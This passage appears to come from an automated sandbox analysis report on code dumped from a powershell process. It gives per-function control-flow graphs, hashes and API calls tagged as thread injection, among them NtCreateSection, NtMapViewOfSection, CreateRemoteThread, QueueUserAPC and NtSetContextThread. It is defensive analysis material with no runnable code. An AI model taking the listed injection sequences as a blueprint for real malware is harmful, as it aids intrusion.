113->114 114->112 116 2dc007f9245-2dc007f929a call 2dc007f41aa 114->116 115->91 121 2dc007f92a4-2dc007f92c2 call 2dc007f2b58 116->121 122 2dc007f929c-2dc007f92a1 116->122 121->115 126 2dc007f92c4-2dc007f92d1 121->126 122->121 126->112 127 2dc007f92d3-2dc007f92df NtSetContextThread 126->127 128 2dc007f92e7-2dc007f92e9 127->128 128->112
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002DC007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_2dc007f0000_powershell.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: 361629354863c7adea9ee09ac62841a8150ea8ab892e9aecf13e9f2ffacfd1d1
                                      • Instruction ID: 1ca673cb41782d2873108274b1b00ed8f4f179486dfc503477eceb3bbe58fdbd
                                      • Opcode Fuzzy Hash: 361629354863c7adea9ee09ac62841a8150ea8ab892e9aecf13e9f2ffacfd1d1
                                      • Instruction Fuzzy Hash: 96227430218E1ACFEBA9EF1C98897A673E1FB58311F71462A954AC3291DF34DD41DB81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 000002DC00817DB4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113nativeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002DC007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_2dc007f0000_powershell.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InformationQueryToken
                                      • String ID: 0
                                      • API String ID: 4239771691-4108050209
                                      • Opcode ID: 8f459d0809fb6108b636d5ca042d46abcd9692ce79b6343a060e938baadf2093
                                      • Instruction ID: ba4752f0959067ba3ec2afddf44dbc163dfb94611e53809d0324dd68aa96d917
                                      • Opcode Fuzzy Hash: 8f459d0809fb6108b636d5ca042d46abcd9692ce79b6343a060e938baadf2093
                                      • Instruction Fuzzy Hash: CE41FC30618B498FD764EF18D8C8B9AB7E5FBD8311F604A2EE48EC3151DB349945CB82
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 000002DC007F79AC Relevance: 4.7, APIs: 3, Instructions: 187nativethreadinjectionCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002DC007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_2dc007f0000_powershell.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInformationProcessRemoteThread
                                      • String ID:
                                      • API String ID: 3020566308-0
                                      • Opcode ID: de513496ae206af5e6081092b5dbc868a720f7c32ac060a41bcfb3c512b8c035
                                      • Instruction ID: 36b6baff6a4a9ed705cef0a9a0cdcbafc7363c86e328ca8ed83ac6f20e16ec49
                                      • Opcode Fuzzy Hash: de513496ae206af5e6081092b5dbc868a720f7c32ac060a41bcfb3c512b8c035
                                      • Instruction Fuzzy Hash: F951A57161CB16CBE768EF2CD84977A77E0EB99312F21452ED90AC3291EA24DC01DB81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 000002DC007F59D4 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214nativeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 248 2dc007f59d4-2dc007f5a16 250 2dc007f5be7 248->250 251 2dc007f5a1c-2dc007f5a5f 248->251 252 2dc007f5bec-2dc007f5c0f 250->252 255 2dc007f5a65-2dc007f5a84 251->255 256 2dc007f5bd3-2dc007f5be5 251->256 255->256 259 2dc007f5a8a-2dc007f5aa9 255->259 256->252 259->256 261 2dc007f5aaf-2dc007f5ace 259->261 261->256 263 2dc007f5ad4-2dc007f5af3 261->263 263->256 265 2dc007f5af9-2dc007f5b7b call 2dc008151f8 NtCreateSection 263->265 268 2dc007f5bc2-2dc007f5bc7 265->268 269 2dc007f5b7d-2dc007f5b9a call 2dc008010b4 265->269 275 2dc007f5bc9-2dc007f5bcb 268->275 273 2dc007f5bb8-2dc007f5bc0 269->273 274 2dc007f5b9c-2dc007f5bb6 call 2dc008151f8 269->274 273->275 274->275 275->256 277 2dc007f5bcd-2dc007f5bd1 275->277 277->252
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002DC007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_2dc007f0000_powershell.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Section$CreateView
                                      • String ID: 0
                                      • API String ID: 1585966358-4108050209
                                      • Opcode ID: 8b919d054a1b8379d396ee9ee7003490226db2f3546486956fc07ada3ef7e19a
                                      • Instruction ID: c116546b8e8b74e6a5d9c074626810eb4b2a314f4103a3ad4a43a93ecfff201f
                                      • Opcode Fuzzy Hash: 8b919d054a1b8379d396ee9ee7003490226db2f3546486956fc07ada3ef7e19a
                                      • Instruction Fuzzy Hash: C271907021CF098FEB54EF18D889BA5B7E5FB98311F21056ED94AC7262DB34D841CB81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 000002DC00808C30 Relevance: 2.6, APIs: 1, Instructions: 1069synchronizationCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 333 2dc00808c30-2dc00808caf 336 2dc00808cb1-2dc00808ce3 call 2dc008151f8 333->336 337 2dc00808ce5-2dc00808ce6 333->337 339 2dc00808ce8-2dc00808ceb 336->339 337->339 341 2dc00808cf1-2dc00808d1a CreateMutexExA 339->341 342 2dc0080985a-2dc00809876 339->342 345 2dc00808d1c-2dc00808d21 341->345 346 2dc00808d38-2dc00808d3b 341->346 349 2dc00808d23-2dc00808d30 345->349 350 2dc00808d35-2dc00808d36 345->350 347 2dc00808d41-2dc00808d68 346->347 348 2dc00809857-2dc00809858 346->348 353 2dc00808d6e-2dc00808dba 347->353 354 2dc00808e2f-2dc00808e30 347->354 348->342 349->348 350->346 368 2dc00808dbc-2dc00808dc3 353->368 369 2dc00808dd1-2dc00808de1 353->369 355 2dc00808e32-2dc00808e35 354->355 355->342 357 2dc00808e3b-2dc00808e7c 355->357 360 2dc00808f20-2dc00808f21 357->360 361 2dc00808e82-2dc00808e88 357->361 362 2dc00808f23-2dc00808f26 360->362 364 2dc00808ef6-2dc00808f1e call 2dc008140ec 361->364 365 2dc00808e8a-2dc00808e98 361->365 362->342 367 2dc00808f2c-2dc00808f47 362->367 364->362 370 2dc00808e9a-2dc00808ee2 365->370 380 2dc00808f78-2dc00808f8a 367->380 381 2dc00808f49-2dc00808f65 367->381 368->369 373 2dc00808dc5-2dc00808dcb call 2dc007ffa80 368->373 372 2dc00808de7-2dc00808e10 369->372 374 2dc00808eee-2dc00808ef4 370->374 375 2dc00808ee4-2dc00808ee8 370->375 382 2dc00808e12-2dc00808e2d 372->382 373->369 374->364 374->370 375->374 383 2dc00808f8c-2dc00808f91 380->383 384 2dc00808f93-2dc00808fdc 380->384 381->380 388 2dc00808f67-2dc00808f70 381->388 382->355 383->384 386 2dc00808ffe-2dc00809003 383->386 396 2dc00808fde-2dc00808fe7 384->396 397 2dc00808fef-2dc00808ff0 384->397 389 2dc00809045-2dc00809048 386->389 390 2dc00809005-2dc00809026 386->390 388->380 391 2dc0080905f-2dc00809096 389->391 392 2dc0080904a-2dc0080905a call 2dc007f41aa 389->392 402 2dc00809028-2dc0080902f 390->402 403 2dc0080903a-2dc00809042 390->403 400 2dc00809098-2dc008090b8 391->400 401 2dc008090f9 391->401 392->391 409 2dc0080911c-2dc00809128 396->409 410 2dc00808fed 396->410 406 2dc00808ff8 397->406 416 2dc008090be-2dc008090dc call 2dc007f3dd8 400->416 404 2dc008090fe-2dc00809101 401->404 402->403 407 2dc00809031-2dc00809038 402->407 403->389 404->342 408 2dc00809107-2dc0080910a 404->408 406->386 407->389 412 2dc0080910c-2dc00809111 call 2dc0081578c 408->412 413 2dc00809113-2dc00809116 408->413 414 2dc008091a2-2dc008091b4 call 2dc00811ed4 409->414 415 2dc0080912a-2dc0080915b call 2dc007f7b98 409->415 410->406 412->413 413->342 413->409 427 2dc008091ee-2dc00809200 call 2dc007fd2ec 414->427 428 2dc008091b6-2dc008091e7 call 2dc007f7b98 414->428 415->414 429 2dc0080915d-2dc00809165 415->429 425 2dc008090de-2dc008090e7 416->425 426 2dc008090eb 416->426 425->416 431 2dc008090e9 425->431 432 2dc008090f0-2dc008090f7 426->432 438 2dc00809208-2dc0080924f call 2dc007f93dc call 2dc007f8184 427->438 428->438 439 2dc008091e9-2dc008091ea 428->439 429->414 430 2dc00809167-2dc0080919c call 2dc0080eb8c 429->430 430->414 431->432 432->404 446 2dc00809251-2dc00809270 438->446 447 2dc00809278-2dc0080927b call 2dc007f9588 438->447 439->427 446->447 450 2dc00809280-2dc00809285 447->450 450->342 451 2dc0080928b-2dc008092a4 450->451 451->342 453 2dc008092aa-2dc008092d2 451->453 455 2dc008092d4-2dc008092e9 453->455 456 2dc008092f8-2dc00809322 call 2dc0080c9f0 453->456 455->456 460 2dc008092eb-2dc008092f3 455->460 461 2dc00809331-2dc00809340 456->461 462 2dc00809324-2dc0080932c 456->462 460->342 463 2dc00809346-2dc0080937c call 2dc008140ec 461->463 464 2dc00809609-2dc00809610 461->464 462->342 481 2dc0080937e-2dc00809385 463->481 482 2dc00809389-2dc0080938c 463->482 466 2dc00809616-2dc0080963a call 2dc007f41b0 464->466 467 2dc00809798-2dc008097a1 464->467 477 2dc008096dd-2dc008096fe call 2dc007f41b0 466->477 478 2dc00809640-2dc00809660 call 2dc007fdae0 466->478 467->348 469 2dc008097a7-2dc008097ac 467->469 473 2dc0080981e-2dc0080984c call 2dc0080c9f0 469->473 474 2dc008097ae-2dc008097b1 469->474 473->462 489 2dc00809852-2dc00809854 473->489 479 2dc008097c3-2dc008097e0 474->479 480 2dc008097b3-2dc008097bd 474->480 477->467 494 2dc00809704-2dc00809721 call 2dc007fdae0 477->494 478->477 495 2dc00809662-2dc0080966f 478->495 479->473 493 2dc008097e2-2dc00809814 479->493 480->479 481->482 482->342 487 2dc00809392-2dc0080945f call 2dc007f4244 * 4 482->487 519 2dc008094cd-2dc008094d0 487->519 520 2dc00809461-2dc00809468 487->520 489->348 493->473 494->467 502 2dc00809723-2dc00809730 494->502 498 2dc00809671-2dc008096b6 call 2dc0081b3a8 call 2dc007fa044 495->498 499 2dc008096cb-2dc008096d5 495->499 498->499 518 2dc008096b8-2dc008096c6 call 2dc007f4070 498->518 499->477 505 2dc00809732-2dc00809778 call 2dc0081b3a8 call 2dc007fa044 502->505 506 2dc00809786-2dc00809790 502->506 505->506 529 2dc0080977a-2dc00809781 call 2dc00801f1c 505->529 506->467 518->499 519->342 523 2dc008094d6-2dc008094dd 519->523 520->519 524 2dc0080946a-2dc00809485 520->524 526 2dc008094df-2dc008094ee 523->526 527 2dc008094f4-2dc00809513 523->527 531 2dc0080948f-2dc008094bb call 2dc0080c9f0 524->531 532 2dc00809487-2dc0080948d 524->532 526->527 534 2dc00809553-2dc00809593 527->534 535 2dc00809515-2dc0080954e call 2dc00812400 527->535 529->506 531->519 542 2dc008094bd-2dc008094c3 531->542 540 2dc008094cb 532->540 543 2dc00809595-2dc008095b2 call 2dc0080c9f0 534->543 544 2dc008095d6-2dc008095dc 534->544 535->534 540->519 542->540 550 2dc008095b4-2dc008095b9 543->550 551 2dc008095bb-2dc008095d4 543->551 549 2dc008095de-2dc008095e1 544->549 549->342 552 2dc008095e7-2dc008095f2 549->552 550->549 551->549 552->467 553 2dc008095f8-2dc00809604 call 2dc00808af4 552->553 553->467
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002DC007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_2dc007f0000_powershell.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Create$MutexQueueThreadUser
                                      • String ID:
                                      • API String ID: 1097034428-0
                                      • Opcode ID: 941571099aad18ea7affcf372cf637b6d2292183614781d015a78eef3a685228
                                      • Instruction ID: f41f47b829f193d8cec4b53db244a3ef747e6ba71c04212181cc395407064ff3
                                      • Opcode Fuzzy Hash: 941571099aad18ea7affcf372cf637b6d2292183614781d015a78eef3a685228
                                      • Instruction Fuzzy Hash: A372B471618A08CFE798EF18EC896A533E1F754711F21862FD48BC31A2DE38D946DB81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 000002DC00803B64 Relevance: 1.8, APIs: 1, Instructions: 292memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 558 2dc00803b64-2dc00803b9a 559 2dc00803b9c-2dc00803ba4 558->559 560 2dc00803ba6-2dc00803ba7 558->560 561 2dc00803ba9-2dc00803bce HeapCreate 559->561 560->561 563 2dc00803bd0-2dc00803bd3 561->563 564 2dc00803bd8-2dc00803c02 561->564 565 2dc00803deb-2dc00803dee 563->565 569 2dc00803c63-2dc00803c69 564->569 570 2dc00803c04-2dc00803c0c 564->570 567 2dc00803df0-2dc00803e18 565->567 568 2dc00803e49-2dc00803e62 565->568 567->568 572 2dc00803e1a-2dc00803e31 567->572 577 2dc00803c6b-2dc00803c6d 569->577 575 2dc00803c0e-2dc00803c17 570->575 576 2dc00803c1b 570->576 572->568 589 2dc00803e33-2dc00803e3e 572->589 578 2dc00803c1d-2dc00803c5a 575->578 579 2dc00803c19 575->579 576->578 581 2dc00803c5c-2dc00803c61 576->581 577->565 582 2dc00803c73-2dc00803c8f call 2dc008011f4 577->582 578->577 579->576 581->577 587 2dc00803da4-2dc00803da6 582->587 588 2dc00803c95-2dc00803cd4 582->588 587->565 590 2dc00803da8-2dc00803dc0 call 2dc0080e478 587->590 595 2dc00803d97 588->595 596 2dc00803cda-2dc00803ced call 2dc007f41aa 588->596 589->568 591 2dc00803e40-2dc00803e48 589->591 590->565 601 2dc00803dc2-2dc00803de4 call 2dc00816070 call 2dc00812550 590->601 591->568 599 2dc00803d9c-2dc00803d9d 595->599 604 2dc00803d5d 596->604 605 2dc00803cef-2dc00803d00 596->605 599->587 611 2dc00803de9 601->611 609 2dc00803d64-2dc00803d6c 604->609 607 2dc00803d02-2dc00803d53 call 2dc0081b3a8 605->607 616 2dc00803d55-2dc00803d5b 607->616 612 2dc00803d6e-2dc00803d7e 609->612 613 2dc00803d80-2dc00803d95 609->613 611->565 612->599 613->599 616->609
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002DC007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_2dc007f0000_powershell.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateHeap
                                      • String ID:
                                      • API String ID: 10892065-0
                                      • Opcode ID: 42b612c78fe9b70062130d364ca0d4e6e8c0bf91701461e5dfe428bbca03cae4
                                      • Instruction ID: 3be7300b04faebb67deb16eb8384b9f15475fa4bc3cc5feaaf4330994d0254f8
                                      • Opcode Fuzzy Hash: 42b612c78fe9b70062130d364ca0d4e6e8c0bf91701461e5dfe428bbca03cae4
                                      • Instruction Fuzzy Hash: E9919430618B0A8FFBA4EB68D88976637E5FB94311F21432AE446C31A1EF74DD42D741
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 000002DC00817D48 Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 699 2dc00817d48-2dc00817d76 NtQueryInformationProcess 700 2dc00817da3-2dc00817db0 699->700 701 2dc00817d78-2dc00817d80 699->701 701->700 702 2dc00817d82-2dc00817d8d 701->702 703 2dc00817d9e-2dc00817da1 702->703 703->700 704 2dc00817d8f-2dc00817d97 703->704 704->700 705 2dc00817d99-2dc00817d9c 704->705 705->703
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002DC007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_2dc007f0000_powershell.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InformationProcessQuery
                                      • String ID:
                                      • API String ID: 1778838933-0
                                      • Opcode ID: 2cbd10eb540a1377c62dc1952105ae5ca313dfe62637f8386d5eb1acd45784ee
                                      • Instruction ID: be1c6786b8653b781d3da8d52df3d3e7213b71b8eeb0accc537c9ad08601b1f2
                                      • Opcode Fuzzy Hash: 2cbd10eb540a1377c62dc1952105ae5ca313dfe62637f8386d5eb1acd45784ee
                                      • Instruction Fuzzy Hash: 32014430218D0E8FE794DF68E4C8A7573E6FFA8715F61066EA409C3159DB74D841C705
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 000002DC008010B4 Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 706 2dc008010b4-2dc00801105 NtMapViewOfSection 707 2dc0080110e-2dc0080111a 706->707 708 2dc00801107-2dc0080110c 706->708 708->707
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002DC007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_2dc007f0000_powershell.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: SectionView
                                      • String ID:
                                      • API String ID: 1323581903-0
                                      • Opcode ID: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                                      • Instruction ID: 84f763039e873d8ea0f6af8e53bbf45a74b7ab7bca5f70d7eddc0c04c64438f7
                                      • Opcode Fuzzy Hash: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                                      • Instruction Fuzzy Hash: 9C01D670A08B048FCB48DF69D4C8569BBE1FB58311F20066FE949C7796DB70D885CB45
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 000002DC007F2B58 Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002DC007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_2dc007f0000_powershell.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: MemoryVirtualWrite
                                      • String ID:
                                      • API String ID: 3527976591-0
                                      • Opcode ID: d8c855afc7970eb24a71728fbfc2e8406778788fce13a2eb5631248942bfb38d
                                      • Instruction ID: 66450d23bf179c56af9b9e01201aa7a3238d535ce7d362d05ddf5dc53a2659b6
                                      • Opcode Fuzzy Hash: d8c855afc7970eb24a71728fbfc2e8406778788fce13a2eb5631248942bfb38d
                                      • Instruction Fuzzy Hash: 63E06D70710A428BFB146FB9988C23873D0F748312F31082AE845C72A1EA2D8842DA41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 000002DC007F87DC Relevance: 4.6, APIs: 3, Instructions: 145fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 186 2dc007f87dc-2dc007f8806 call 2dc0080e478 189 2dc007f8921-2dc007f8938 186->189 190 2dc007f880c-2dc007f8823 call 2dc00817f58 186->190 193 2dc007f8829-2dc007f883e 190->193 194 2dc007f890d-2dc007f8919 190->194 195 2dc007f8842-2dc007f8846 193->195 194->189 196 2dc007f8848-2dc007f8862 195->196 197 2dc007f8864-2dc007f8871 195->197 196->197 198 2dc007f8879-2dc007f8884 196->198 197->194 199 2dc007f8877 197->199 198->194 200 2dc007f888a-2dc007f88bd CreateFileA 198->200 199->195 200->194 201 2dc007f88bf-2dc007f88d2 SetFilePointer 200->201 202 2dc007f8904-2dc007f8905 201->202 203 2dc007f88d4-2dc007f88f4 ReadFile 201->203 202->194 203->202 204 2dc007f88f6-2dc007f88fb 203->204 204->202 205 2dc007f88fd-2dc007f8902 204->205 205->202
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002DC007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_2dc007f0000_powershell.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CreatePointerRead
                                      • String ID:
                                      • API String ID: 2103328899-0
                                      • Opcode ID: 876d94c119db6849c9370046cb500efc55646bd6fdd98435b9b0f08470bcb9d3
                                      • Instruction ID: fb23243592a3eb1a3826393923401b4a821ae0fd06418b07c5e6d9ba2c5ebb1d
                                      • Opcode Fuzzy Hash: 876d94c119db6849c9370046cb500efc55646bd6fdd98435b9b0f08470bcb9d3
                                      • Instruction Fuzzy Hash: 7C418430218A198FE798DF28D88873977E1F794315F35466ED05AC31A1DE79D843DB42
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 000002DC00813008 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 222COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 206 2dc00813008-2dc0081305a 208 2dc008131f1 206->208 209 2dc00813060-2dc00813063 206->209 211 2dc008131f6-2dc0081320c 208->211 210 2dc00813065-2dc0081306b 209->210 212 2dc0081306d-2dc00813070 210->212 213 2dc008130b8-2dc008130ba 210->213 216 2dc0081309e-2dc008130a0 212->216 217 2dc00813072-2dc00813075 212->217 214 2dc008130bc-2dc008130c1 213->214 215 2dc008130c3-2dc008130c6 213->215 214->215 218 2dc008130cc-2dc008130ee 215->218 219 2dc008131d8 215->219 221 2dc008130a2-2dc008130a9 216->221 222 2dc008130ab-2dc008130ac 216->222 217->216 220 2dc00813077-2dc00813079 217->220 229 2dc008131d1-2dc008131d6 218->229 230 2dc008130f4-2dc00813101 218->230 226 2dc008131dd-2dc008131ef RtlDeleteBoundaryDescriptor 219->226 224 2dc0081307b-2dc0081307e 220->224 225 2dc0081309a-2dc0081309c 220->225 221->222 223 2dc008130af-2dc008130b6 222->223 223->210 223->213 224->215 228 2dc00813080-2dc0081308b 224->228 225->223 226->211 231 2dc0081308d 228->231 232 2dc00813090-2dc00813097 228->232 229->226 233 2dc008131c4-2dc008131cf 230->233 234 2dc00813107-2dc0081310d 230->234 231->232 232->225 233->226 235 2dc0081310f-2dc00813163 234->235 238 2dc00813165-2dc00813166 235->238 239 2dc0081319b-2dc008131b9 235->239 240 2dc00813168-2dc00813177 238->240 239->235 243 2dc008131bf-2dc008131c0 239->243 244 2dc00813194 240->244 245 2dc00813179-2dc00813190 240->245 243->233 247 2dc00813196-2dc00813197 244->247 245->240 246 2dc00813192 245->246 246->247 247->239
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002DC007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_2dc007f0000_powershell.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BoundaryDeleteDescriptor
                                      • String ID:
                                      • API String ID: 3203483114-3916222277
                                      • Opcode ID: 288f9c1cbce8911936c130478318fe4cf2356879a3dc1ca2d5e6530766e1ddb2
                                      • Instruction ID: 6c87d597f50189ecbb6da6a5f7bc4e70983dc45449c6e1d3d2d201544c57b9a2
                                      • Opcode Fuzzy Hash: 288f9c1cbce8911936c130478318fe4cf2356879a3dc1ca2d5e6530766e1ddb2
                                      • Instruction Fuzzy Hash: CF513F71618A458BE728AF1C9C8D2B973D5FB89721F75033ED9CAC3292D9245D42C782
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 000002DC00814DC8 Relevance: 3.2, APIs: 2, Instructions: 234threadinjectionCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002DC007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_2dc007f0000_powershell.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Thread$ResumeSuspend
                                      • String ID:
                                      • API String ID: 3472746266-0
                                      • Opcode ID: 341209e84b548f9049f8f83d80656181302a846ef09d3cd64fff549bb4252ca5
                                      • Instruction ID: c7470e8dbcafaef9e73c1553036b10dd36f8d993605db5816258fff4a9862d6c
                                      • Opcode Fuzzy Hash: 341209e84b548f9049f8f83d80656181302a846ef09d3cd64fff549bb4252ca5
                                      • Instruction Fuzzy Hash: E261B830708B098BE798DB18D4497AA73D5FB89722F21562EE58BC3282DF34DD42C746
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 000002DC0080C9F0 Relevance: 3.1, APIs: 2, Instructions: 59threadinjectionCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 326 2dc0080c9f0-2dc0080ca2c CreateThread 327 2dc0080ca2e-2dc0080ca3f QueueUserAPC 326->327 328 2dc0080ca67-2dc0080ca79 326->328 327->328 329 2dc0080ca41-2dc0080ca5f 327->329 329->328
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002DC007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_2dc007f0000_powershell.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateQueueThreadUser
                                      • String ID:
                                      • API String ID: 3600083758-0
                                      • Opcode ID: f9d1119d2a6f7ede32f3f151a7b292346c93d34cb54adac41a0938bd19bbd9d1
                                      • Instruction ID: 744f197407f86141db0c87a2d7097569444c592f8ddca56619a9ee7a4be4f574
                                      • Opcode Fuzzy Hash: f9d1119d2a6f7ede32f3f151a7b292346c93d34cb54adac41a0938bd19bbd9d1
                                      • Instruction Fuzzy Hash: DE017530718A098FEB84EF6C984D76977E2EBA8711B25826AE409C32B0DF34DC51C781
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 000002DC00812550 Relevance: 1.7, APIs: 1, Instructions: 152COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002DC007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_2dc007f0000_powershell.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ContinueHandlerVectored
                                      • String ID:
                                      • API String ID: 3758255415-0
                                      • Opcode ID: 7244c2c071395b83f47e7f4185413d39c7c9846b9b288bc70064fa91beeae027
                                      • Instruction ID: c32eafd2e86e7f0cc96e380a21902686c415bea8687edbaa321183bdc3e89d4f
                                      • Opcode Fuzzy Hash: 7244c2c071395b83f47e7f4185413d39c7c9846b9b288bc70064fa91beeae027
                                      • Instruction Fuzzy Hash: D651C331608A0A8FF794EF3898587EA77D2FB98316F25432A9046C21A2DF38C851DB41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 000002DC007FC088 Relevance: 1.6, APIs: 1, Instructions: 105COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002DC007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_2dc007f0000_powershell.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: aea9cbd2d73816048cc4defc325b6d5fd571de504d5c21790c552a3858797b3b
                                      • Instruction ID: 8fbab240cc89742bcb4e7682545db7e7075e059370059e15fa8fa12372a2a65e
                                      • Opcode Fuzzy Hash: aea9cbd2d73816048cc4defc325b6d5fd571de504d5c21790c552a3858797b3b
                                      • Instruction Fuzzy Hash: 1231A8303142098BF769EB2C9D9967A33D2EB89312F31412AA047C3292DF2CDC07DB42
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 000002DC007F41B0 Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
